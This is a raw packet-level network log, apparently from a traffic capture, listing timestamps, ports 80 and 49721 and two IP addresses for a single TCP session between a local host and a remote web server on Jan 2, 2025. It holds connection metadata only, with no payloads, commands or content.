Jan 2, 2025 19:14:15.734800100 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734810114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734812975 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734838009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734848976 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734848976 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734859943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734875917 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734886885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734896898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734906912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734958887 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734958887 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734958887 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734977961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735016108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735027075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735064983 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735178947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735196114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735205889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735217094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735223055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735232115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735234976 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735250950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735255957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735258102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735263109 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735269070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735280037 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735284090 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735301018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735311031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735316992 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735332966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735336065 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735344887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735357046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735368013 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735388041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735399008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735404015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735404968 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735404968 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735409975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735420942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735430956 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735440016 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735455036 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735467911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735471964 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735471964 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735471964 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735502005 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735508919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735521078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735531092 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735541105 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735552073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735562086 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735565901 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735574007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.735590935 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735610008 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735635042 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.735949993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.736022949 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.736033916 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.736046076 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.736057997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.736068964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.736076117 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.736080885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.736095905 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.736099005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.736109972 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.736124039 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.736124992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.736136913 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.736139059 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.736166000 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.770332098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.770379066 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.770385027 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.770391941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.770405054 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.770425081 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.770428896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.770478964 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.770555019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.770570040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.770622969 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.811705112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.811747074 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.811769962 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.811784029 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.811795950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.811809063 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.811829090 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.811866999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.811907053 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.811929941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.811943054 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812000990 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812084913 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812098026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812112093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812122107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812134027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812134981 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812144995 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812156916 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812160015 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812169075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812181950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812192917 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812210083 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812227964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812239885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812249899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812262058 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812262058 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812262058 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812262058 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812262058 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812273026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812284946 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812294960 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812333107 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812361002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812372923 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812383890 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812396049 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812408924 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812412977 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812419891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812432051 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812490940 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812509060 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812513113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812524080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812541008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812549114 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812556028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812572956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812577009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812589884 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812599897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812612057 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812618017 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812623024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812639952 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812644958 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812676907 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812676907 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812838078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812849998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812860012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812872887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812890053 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812901020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812905073 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812912941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812923908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812937021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812937021 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812947989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812959909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812971115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.812977076 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.812980890 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813014984 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813014984 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813061953 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813076019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813164949 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813205004 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813224077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813235044 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813246012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813256025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813266039 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813268900 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813281059 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813291073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813294888 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813309908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813322067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813333035 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813333988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813353062 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813359022 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813363075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813369989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813373089 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813374996 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813380003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813385963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813395977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813406944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813416004 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813426971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813431978 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813440084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813452005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813452005 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813466072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813478947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813525915 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813525915 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813868999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813880920 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813891888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813903093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813915968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813925982 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813930035 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813934088 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813956022 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813960075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813972950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813983917 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.813988924 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.813996077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.814007998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.814018965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.814029932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.814033985 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.814042091 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.814081907 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.817754984 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.820811033 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.820822954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.820833921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.820848942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.820859909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.820871115 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.820872068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.820883989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.820894003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.820955038 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.820955038 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.857244015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.857259035 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.857270956 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.857280970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.857291937 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.857302904 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.857316971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.857330084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.857335091 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.857369900 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.857397079 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.898530960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898613930 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898627043 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898638964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898655891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898667097 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898679018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898679972 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.898694038 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898713112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898725033 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898741961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898749113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.898749113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.898757935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898770094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898782015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898785114 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.898792982 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898804903 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898809910 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.898821115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898832083 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898840904 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.898842096 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898864031 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.898866892 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898886919 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.898947001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898952007 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.898953915 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898958921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898972034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898983002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.898993015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899014950 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899014950 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899044037 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899091005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899166107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899187088 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899190903 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899197102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899199009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899204016 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899221897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899233103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899239063 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899244070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899276018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899276018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899285078 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899300098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899311066 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899327993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899339914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899396896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899396896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899410009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899420977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899432898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899456978 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899467945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899476051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899478912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899492025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899504900 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899509907 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899516106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899529934 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899529934 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899543047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899585009 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899585009 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899756908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899770021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899781942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899827957 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899827957 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899909973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899926901 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899938107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899947882 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899959087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899969101 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899980068 CET	80	49721	147.45.44.131	192.168.2.5
